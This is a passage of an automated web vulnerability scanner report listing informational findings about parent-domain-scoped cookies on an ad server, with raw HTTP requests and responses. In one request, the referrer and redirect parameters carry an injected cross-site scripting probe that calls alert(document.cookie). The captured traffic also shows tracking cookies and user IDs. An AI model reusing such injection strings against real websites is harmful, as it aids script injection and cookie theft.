Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27438&s=27439
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:19:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:19:45 GMT; domain=.adnxs.com; HttpOnly
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9NzkmdGw9MTQ0MCZkcF9pZD01Nw==&vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9NzgmdGw9MTU3NjgwMCZkcF9pZD01Nw==&piggybackCookie=uid:3420415245200633085
Date: Mon, 13 Jun 2011 11:19:45 GMT
Content-Length: 0

12.83. http://ib.adnxs.com/mapuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:23:49 GMT; domain=.adnxs.com; HttpOnly
uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:23:49 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)k=m<8a)J710Kt5^P:_7Ny.Z_6mLS?@rOn<S?m4mV81(Gq?4CtUGYNV0fU8.l8D'dGmAzaz)B4mK)>d]<-)][bFvXv^yQm6(f/!6P<ZZA-M-pcEopQE8sg^/JEbY+(TJDL+xqPpbtw8ThYLL$^(MW*Gu1eA_WN@+Zyj[(9fH_r#TJsyDKL3.lIn#TUyLy`$-uML`xrN5N7EE08*w$zKuDKi.7sri+#ijhuM?jgMHOaey!04e$=?u(GlAql'9A0e_M$J+HDS1ZYlcF08rb+380a.guktAlVtmGPZ<.-h9Xn=PKKN+niMd^PR*MiDDuMyTv9FBI^ApFnzux:wiInoGvUn2HbWIs*o<VK:Tebjduz5SH5''d#MA<iL1]h=Opp`^427jwgMcrRIR#'QV#`7u-wpC>UujmF.SvpiglJUV3)^+R?Z9L1c$/one!Fgj+l9QA=gF)BLJh*WxcM_WoI%qez5Clx@ljIFiPW9]pQsp9`B[Mpu8?K-(x0cae9?oW@-NP5t_+:bksh40dDxt45'q3s7PE6(FrdX/^)5Ku4w#SVg!gqrvr^)DW8Da)2P'#1ocV3clVn#<i(v-EeCyriK<ImxeUpkU:!WB6/QRHzJWB=/HxWbbXu+vqgP<L2f>kTn#-zRufDUwwBzwtjUVN; path=/; expires=Sun, 11-Sep-2011 11:23:49 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=311&user=120221f8320d7dc&seg_code=ak.a,cm.tech_l,cm.cm_xpd5_rtg,dx.13,dx.1,dx.10,dx.12,dx.22,dx.31,dx.34,dx.36,dx.40,dx.bh,dx.bj,dx.bn,dx.bo,dx.bs,wfm.hliv_h,wfm.health_l,idgt.telco_l,bz.25&ord=1307963916 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIyaEDEAoYAiACKAIwveHX7wQQveHX7wQYAQ..; acb645526=![nC'kI/7Z208jSlb1@WvA.(S?enc=PDw8vLS0BEAAAACgmZkBQAAAAKCZmQFA_dR46SaxBUCF61G4HoUJQOtdn4PwOjpp_ayDGovBdy-98PVNAAAAAMf7BwACAgAANQEAAAIAAABpowUADB8BAAEAAABVU0QAVVNEANgCWgDwAgAA3w4BAgUCAQUAAAAAkiK-AQAAAAA.&tt_code=748066&udj=uf%28%27a%27%2C+15288%2C+1307963581%29%3Buf%28%27r%27%2C+369513%2C+1307963581%29%3Bppv%2811776%2C+%277582437727306472939%27%2C+1307963581%2C+1310555581%2C+62058%2C+73484%29%3B&cnd=!nSAXCQjq5AMQ6cYWGAAgjL4EMAA48AVAAEi1AlDH9x9YAGBVaABwAHgAgAGaAYgBFpABAZgBAaABA6gBA7ABAbkBmZmZwR6FCUDBAZmZmcEehQlAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!NQVcLQjq5AMQ6cYWGIy-BCAA; sess=1; uuid2=3420415245200633085; anj=Kfw)k=m<8a)J710Kt5^P`P10p9>)(y[*E`[*2Dd`m%/%0ui-pNE7i9O?9a1`23m2eD'dGoAzd<.*36MA1$-@v.PM:XvXxud%]<A>EF59!b('Qjd^brJmlS_0CJ`asQ8GAU?iKvdC2@3lQ/y?Qb%0]lF0*0AQOvlI.3UH_3G'5C()2_Lv/gIBnT95i0gsT%Z1<YKGc4uTwQkGc:a-B$6U2RuiMW*s]+$%cD8mJoTp1UJNX.VN0R%o@ZA>2M^oiLkmD%!jcxwG/<KH1lpT%Q?]M[@MoWNi^D2L@SN.o'!hm^Z!M[8USLLyY'-+Qt@w0qNVuOzrR>avjn/Nv15P%S<0x7Zw8GbZQE=eC)jlQY<`901E.wdq>wn'f]e9htC+ehRhk=CC.EPEW2'MFW:q]`GPaS7vV$2FMI(tefVUOW1fo>'e(v.+gC]_/N`W=a3.pdyRtp*f7`Pmg^7ce]?YgVg/SrdEBGhmqZ-LTb9ArcZ.]fw`BF0>NuT6u:9q0CZ<zPPWn4c5uHxZrD(ADpF9h`<*X`L7B'Y]`H35Z91_(Rki)<cLs7'Oes=5'`u6>w/08o9(+M*2MQ=EW[E!owTJZ+o?#^nV0i2ipkgADX]rRAFuayBv(H1!e

Response

12.84. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly
icu=ChEIs34QChgBIAEoATCP5NfvBAoSCMmhAxAKGAMgAygDMNjk1-8EENjk1-8EGAM.; path=/; expires=Sun, 11-Sep-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly
acb364660=![nC'kI/7Z208jSlb1@WTp.OE?enc=PDw8vLS0BEAAAACgmZkBQAAAAKCZmQFA_dR46SaxBUCF61G4HoUJQNX8NSufw8hS_ayDGovBdy9Y8vVNAAAAAMf7BwACAgAANQEAAAIAAABrowUADB8BAAEAAABVU0QAVVNEANgCWgDwAgAAiQQBAgUCAQUAAAAARyJ_BAAAAAA.&tt_code=748066&udj=uf%28%27a%27%2C+15288%2C+1307963992%29%3Buf%28%27r%27%2C+369515%2C+1307963992%29%3Bppv%2811776%2C+%275965232794844396757%27%2C+1307963992%2C+1310555992%2C+62058%2C+73484%29%3B&cnd=!lSCdBwjq5AMQ68YWGAAgjL4EMAA48AVAAEi1AlDH9x9YAGBVaABwAHgAgAGkAYgBApABAZgBAaABA6gBA7ABAbkBmZmZwR6FCUDBAZmZmcEehQlAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!NwVuLQjq5AMQ68YWGIy-BCAA; path=/; expires=Tue, 14-Jun-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)k=m<8a)J710Kt67a:_4*o.Z_63317X4A_CV#L8ht=0reumdiq`dRG%C$AF>^UD'dGmAzb!D*E=Y#)WZ0R#Hz)d5%N/*(7EnvZl'%CbFD'euYkZ%vu'7oeIUny=KW5ulnkFr]iu=hsPF2wJfSi1L3_2Yu6c*uagm<!ev@^J!'>%DnvN/XdT0vH*So-tadh*MHehfMhi4_F+l#7(uW[Rku(]]as#VXE7(u]OJftB>YK>'G?>MH%t<lq[K]H55I5V^UusrS%nM=eSnShwCk85B`$.E4^x1=Tl7K%tB`t4$p0>N%1K@L$EEy2d+>SzF)Cm@>?^GS$F=oKD7K6=b/+:1-3HwLXwtr'I(OOJn`pGPIem->[h#9OHVw'_xeG3`9%1-fcP_(U!1FEG7Vm$AuCto6_RSS-p9K6fJI]!8h]A-7$<JzhMWuJ:)lObw(fO-uWt/Dt)5sQoaSlSkim:_Aa8EFmKEH[kYx%(+]4Q91vJ^M)j$v*>EIM/g(xCQzFEO_fBprrz0uKLw3K)U#nAHJwYUQ9tJ/p^(8H>Xp*.A6YWDYL902ZxB=?MSPefD+%[$N_Wq)^xenZt@1kPWVl)TVqmhy0LuS_A4sF!c*P>)[YMkTf1:dDbCaf[n72Eg'FL^LwlI7[wZ`E$3%p*Pk%JCxTGnXB; path=/; expires=Sun, 11-Sep-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=514&size=728x90&referrer=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert(document.cookie)-%25225958ea17fd2=1&inv_code=748066&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D748066%26r%3D1%26_salt%3D1188639314%26u%3Dhttp%253A%252F%252Fthesouthern.com%252Fsports%252Fbasketball%252Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%253Fc03b0%252522-alert%2528document.cookie%2529-%2525225958ea17fd2%253D1%26u%3Dhttp%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb142304=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIs34QChgBIAEoATCP5NfvBAoSCMmhAxAKGAMgAygDMNjk1-8EENjk1-8EGAM.; path=/; expires=Sun, 11-Sep-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb364660=![nC'kI/7Z208jSlb1@WTp.OE?enc=PDw8vLS0BEAAAACgmZkBQAAAAKCZmQFA_dR46SaxBUCF61G4HoUJQNX8NSufw8hS_ayDGovBdy9Y8vVNAAAAAMf7BwACAgAANQEAAAIAAABrowUADB8BAAEAAABVU0QAVVNEANgCWgDwAgAAiQQBAgUCAQUAAAAARyJ_BAAAAAA.&tt_code=748066&udj=uf%28%27a%27%2C+15288%2C+1307963992%29%3Buf%28%27r%27%2C+369515%2C+1307963992%29%3Bppv%2811776%2C+%275965232794844396757%27%2C+1307963992%2C+1310555992%2C+62058%2C+73484%29%3B&cnd=!lSCdBwjq5AMQ68YWGAAgjL4EMAA48AVAAEi1AlDH9x9YAGBVaABwAHgAgAGkAYgBApABAZgBAaABA6gBA7ABAbkBmZmZwR6FCUDBAZmZmcEehQlAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!NwVuLQjq5AMQ68YWGIy-BCAA; path=/; expires=Tue, 14-Jun-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)k=m<8a)J710Kt67a:_4*o.Z_63317X4A_CV#L8ht=0reumdiq`dRG%C$AF>^UD'dGmAzb!D*E=Y#)WZ0R#Hz)d5%N/*(7EnvZl'%CbFD'euYkZ%vu'7oeIUny=KW5ulnkFr]iu=hsPF2wJfSi1L3_2Yu6c*uagm<!ev@^J!'>%DnvN/XdT0vH*So-tadh*MHehfMhi4_F+l#7(uW[Rku(]]as#VXE7(u]OJftB>YK>'G?>MH%t<lq[K]H55I5V^UusrS%nM=eSnShwCk85B`$.E4^x1=Tl7K%tB`t4$p0>N%1K@L$EEy2d+>SzF)Cm@>?^GS$F=oKD7K6=b/+:1-3HwLXwtr'I(OOJn`pGPIem->[h#9OHVw'_xeG3`9%1-fcP_(U!1FEG7Vm$AuCto6_RSS-p9K6fJI]!8h]A-7$<JzhMWuJ:)lObw(fO-uWt/Dt)5sQoaSlSkim:_Aa8EFmKEH[kYx%(+]4Q91vJ^M)j$v*>EIM/g(xCQzFEO_fBprrz0uKLw3K)U#nAHJwYUQ9tJ/p^(8H>Xp*.A6YWDYL902ZxB=?MSPefD+%[$N_Wq)^xenZt@1kPWVl)TVqmhy0LuS_A4sF!c*P>)[YMkTf1:dDbCaf[n72Eg'FL^LwlI7[wZ`E$3%p*Pk%JCxTGnXB; path=/; expires=Sun, 11-Sep-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 13 Jun 2011 11:19:52 GMT
Content-Length: 613

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=220&Z=728x90&s=748066&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketbal
...[SNIP]...

12.85. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:23:48 GMT; domain=.adnxs.com; HttpOnly
icu=ChEIs34QChgCIAIoAjDE5tfvBAoSCMmhAxAKGAIgAigCML3h1-8EEMTm1-8EGAM.; path=/; expires=Sun, 11-Sep-2011 11:23:48 GMT; domain=.adnxs.com; HttpOnly
acb441529=5_[r^kI/7ZI[U7D_nG*.NJnK1?enc=AAAAAAAAAEDNzMzMzMz8PwAAAAAAAABAzczMzMzM_D8AAAAAAAAAQLADn5MJcYYC_ayDGovBdy9E8_VNAAAAAPA7AwA3AQAAagEAAAIAAABYbgUAy10AAAEAAABVU0QAVVNEANgCWgCqFAAA0wgBAgUCAQUAAAAA3R7loAAAAAA.&tt_code=cm.mtv&udj=uf%28%27a%27%2C+10117%2C+1307964228%29%3Buf%28%27c%27%2C+49291%2C+1307964228%29%3Buf%28%27r%27%2C+355928%2C+1307964228%29%3Bppv%289239%2C+%27181957120900400048%27%2C+1307964228%2C+1308137028%2C+49291%2C+24011%29%3B&cnd=!VRvpTQiLgQMQ2NwVGAAgy7sBMAA4qilAAEjqAlDw9wxYAGBVaABwAHgAgAEEiAG-wQSQAQGYAQGgAQOoAQOwAQG5AQAAAAAAAABAwQEAAAAAAAAAQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AGbEw..&ccd=!sAQbJQiLgQMQ2NwVGMu7ASAA&custom_macro=CP_ID%5E49291; path=/; expires=Tue, 14-Jun-2011 11:23:48 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)k=m<8a)J710Kt5^P:_2wN.Z_6mgNvBsA_CUxhB@oeN8Vo84NFnfi7!QCO7VMs(2dD<XKIV<ZQ3J0#a$/]1:)J[dK`*a**-BUPo#4C=y/M'7J#ZkhJeT<t6W1?rW+fGd=O.JgCI^JsO#jlf?-bruw_xI1*j_x%DM5s[.NLiJY-LZ0870MW1U<#$L'>qP+82Wf)rdg6iqL<8CAbFAhb3_Mc5ByvvtKIs-K2e91a<_`_EIlZfWv:3vIjJHXDx]Ua:KV?t4NLrlEiuuFkco-ph3ypVTx=Dk%/U]94+jvW2J(8(J6Mq_w8:CzGyKHlmr!IZzlU.-j@x]z*1p*=$Q=MUH>u^=n0<.<)sc0ac@2=?iCZIu310F:b['0R<ahHdaIB/<F?^x8%R)o#pWV.PmFw!TSnh0TYQfM=m2-F9Sv:hVGuR>>r'J/)y)y$NyVui*uPZlMOBVKTzRjwoV^`c8](t/kqIj@Tr'g<N+@CWjOpvrXxXHAsE/s>EI)2*ZX^bvCb:eqgBX#XEVNk35k2xAQ%>yf''w_7G^Q<VUsN2B_nhT>Gqcg1aIpc8puMaqDb(P^t3pLa+a*>J1VXD5y'M]2/TVt#4-^u^7(^ymw%[8s!Rw]^(nGt:y=j%w>U*6s+bEoBp.Ikf9MWCK`h?Os?w.z3A7]U)ea79; path=/; expires=Sun, 11-Sep-2011 11:23:48 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.mtv&size=728x90&imp_id=cm-10119788822_1307963916,120221f8320d7dc&referrer=http%3A%2F%2Fview.atdmt.com%2FPTR%2Fiview%2F240321409%2Fdirect%3Bwi.1%3Bhi.1%2F01%3Frelocate%3Dhttp%3A%2F%2Fviacom.adbureau.net%2FAFTRSERVER%2Fhserver%2Facc_random%3D379297%2Fsite%3Dmtv.mtvi%2Faamsz%3D728x90%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.mtv%2Fent_010111%3Bnet%3Dcm%3Bu%3D%2Ccm-10119788822_1307963916%2C120221f8320d7dc%2Cmusic%2Cax.{PRICEBUCKET}-ak.a-cm.tech_l-cm.cm_xpd5_rtg-dx.13-dx.1-dx.10-dx.12-dx.22-dx.31-dx.34-dx.36-dx.40-dx.bh-dx.bj-dx.bn-dx.bo-dx.bs-wfm.hliv_h-wfm.health_l-idgt.telco_l-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D388700%3Bcontx%3Dmusic%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dak.a%3Bbtg%3Dcm.tech_l%3Bbtg%3Dcm.cm_xpd5_rtg%3Bbtg%3Ddx.13%3Bbtg%3Ddx.1%3Bbtg%3Ddx.10%3Bbtg%3Ddx.12%3Bbtg%3Ddx.22%3Bbtg%3Ddx.31%3Bbtg%3Ddx.34%3Bbtg%3Ddx.36%3Bbtg%3Ddx.40%3Bbtg%3Ddx.bh%3Bbtg%3Ddx.bj%3Bbtg%3Ddx.bn%3Bbtg%3Ddx.bo%3Bbtg%3Ddx.bs%3Bbtg%3Dwfm.hliv_h%3Bbtg%3Dwfm.health_l%3Bbtg%3Didgt.telco_l%3Bbtg%3Dbz.25%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIyaEDEAoYAiACKAIwveHX7wQQveHX7wQYAQ..; acb645526=![nC'kI/7Z208jSlb1@WvA.(S?enc=PDw8vLS0BEAAAACgmZkBQAAAAKCZmQFA_dR46SaxBUCF61G4HoUJQOtdn4PwOjpp_ayDGovBdy-98PVNAAAAAMf7BwACAgAANQEAAAIAAABpowUADB8BAAEAAABVU0QAVVNEANgCWgDwAgAA3w4BAgUCAQUAAAAAkiK-AQAAAAA.&tt_code=748066&udj=uf%28%27a%27%2C+15288%2C+1307963581%29%3Buf%28%27r%27%2C+369513%2C+1307963581%29%3Bppv%2811776%2C+%277582437727306472939%27%2C+1307963581%2C+1310555581%2C+62058%2C+73484%29%3B&cnd=!nSAXCQjq5AMQ6cYWGAAgjL4EMAA48AVAAEi1AlDH9x9YAGBVaABwAHgAgAGaAYgBFpABAZgBAaABA6gBA7ABAbkBmZmZwR6FCUDBAZmZmcEehQlAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!NQVcLQjq5AMQ6cYWGIy-BCAA; sess=1; uuid2=3420415245200633085; anj=Kfw)k=m<8a)J710Kt5^P`P10p9>)(y[*E`[*2Dd`m%/%0ui-pNE7i9O?9a1`23m2eD'dGoAzd<.*36MA1$-@v.PM:XvXxud%]<A>EF59!b('Qjd^brJmlS_0CJ`asQ8GAU?iKvdC2@3lQ/y?Qb%0]lF0*0AQOvlI.3UH_3G'5C()2_Lv/gIBnT95i0gsT%Z1<YKGc4uTwQkGc:a-B$6U2RuiMW*s]+$%cD8mJoTp1UJNX.VN0R%o@ZA>2M^oiLkmD%!jcxwG/<KH1lpT%Q?]M[@MoWNi^D2L@SN.o'!hm^Z!M[8USLLyY'-+Qt@w0qNVuOzrR>avjn/Nv15P%S<0x7Zw8GbZQE=eC)jlQY<`901E.wdq>wn'f]e9htC+ehRhk=CC.EPEW2'MFW:q]`GPaS7vV$2FMI(tefVUOW1fo>'e(v.+gC]_/N`W=a3.pdyRtp*f7`Pmg^7ce]?YgVg/SrdEBGhmqZ-LTb9ArcZ.]fw`BF0>NuT6u:9q0CZ<zPPWn4c5uHxZrD(ADpF9h`<*X`L7B'Y]`H35Z91_(Rki)<cLs7'Oes=5'`u6>w/08o9(+M*2MQ=EW[E!owTJZ+o?#^nV0i2ipkgADX]rRAFuayBv(H1!e

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:23:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:23:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb142304=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIs34QChgCIAIoAjDE5tfvBAoSCMmhAxAKGAIgAigCML3h1-8EEMTm1-8EGAM.; path=/; expires=Sun, 11-Sep-2011 11:23:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb441529=5_[r^kI/7ZI[U7D_nG*.NJnK1?enc=AAAAAAAAAEDNzMzMzMz8PwAAAAAAAABAzczMzMzM_D8AAAAAAAAAQLADn5MJcYYC_ayDGovBdy9E8_VNAAAAAPA7AwA3AQAAagEAAAIAAABYbgUAy10AAAEAAABVU0QAVVNEANgCWgCqFAAA0wgBAgUCAQUAAAAA3R7loAAAAAA.&tt_code=cm.mtv&udj=uf%28%27a%27%2C+10117%2C+1307964228%29%3Buf%28%27c%27%2C+49291%2C+1307964228%29%3Buf%28%27r%27%2C+355928%2C+1307964228%29%3Bppv%289239%2C+%27181957120900400048%27%2C+1307964228%2C+1308137028%2C+49291%2C+24011%29%3B&cnd=!VRvpTQiLgQMQ2NwVGAAgy7sBMAA4qilAAEjqAlDw9wxYAGBVaABwAHgAgAEEiAG-wQSQAQGYAQGgAQOoAQOwAQG5AQAAAAAAAABAwQEAAAAAAAAAQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AGbEw..&ccd=!sAQbJQiLgQMQ2NwVGMu7ASAA&custom_macro=CP_ID%5E49291; path=/; expires=Tue, 14-Jun-2011 11:23:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)k=m<8a)J710Kt5^P:_2wN.Z_6mgNvBsA_CUxhB@oeN8Vo84NFnfi7!QCO7VMs(2dD<XKIV<ZQ3J0#a$/]1:)J[dK`*a**-BUPo#4C=y/M'7J#ZkhJeT<t6W1?rW+fGd=O.JgCI^JsO#jlf?-bruw_xI1*j_x%DM5s[.NLiJY-LZ0870MW1U<#$L'>qP+82Wf)rdg6iqL<8CAbFAhb3_Mc5ByvvtKIs-K2e91a<_`_EIlZfWv:3vIjJHXDx]Ua:KV?t4NLrlEiuuFkco-ph3ypVTx=Dk%/U]94+jvW2J(8(J6Mq_w8:CzGyKHlmr!IZzlU.-j@x]z*1p*=$Q=MUH>u^=n0<.<)sc0ac@2=?iCZIu310F:b['0R<ahHdaIB/<F?^x8%R)o#pWV.PmFw!TSnh0TYQfM=m2-F9Sv:hVGuR>>r'J/)y)y$NyVui*uPZlMOBVKTzRjwoV^`c8](t/kqIj@Tr'g<N+@CWjOpvrXxXHAsE/s>EI)2*ZX^bvCb:eqgBX#XEVNk35k2xAQ%>yf''w_7G^Q<VUsN2B_nhT>Gqcg1aIpc8puMaqDb(P^t3pLa+a*>J1VXD5y'M]2/TVt#4-^u^7(^ymw%[8s!Rw]^(nGt:y=j%w>U*6s+bEoBp.Ikf9MWCK`h?Os?w.z3A7]U)ea79; path=/; expires=Sun, 11-Sep-2011 11:23:48 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 13 Jun 2011 11:23:48 GMT
Content-Length: 806

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.mtv/ent_010111;net=cm;u=,cm-10119788822_1307963916,120221f8320d7dc,music,ax.180-ak.a-cm.tech_l-cm.cm_xpd5_rtg-dx.
...[SNIP]...

12.86. http://ib.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:13:30 GMT; domain=.adnxs.com; HttpOnly
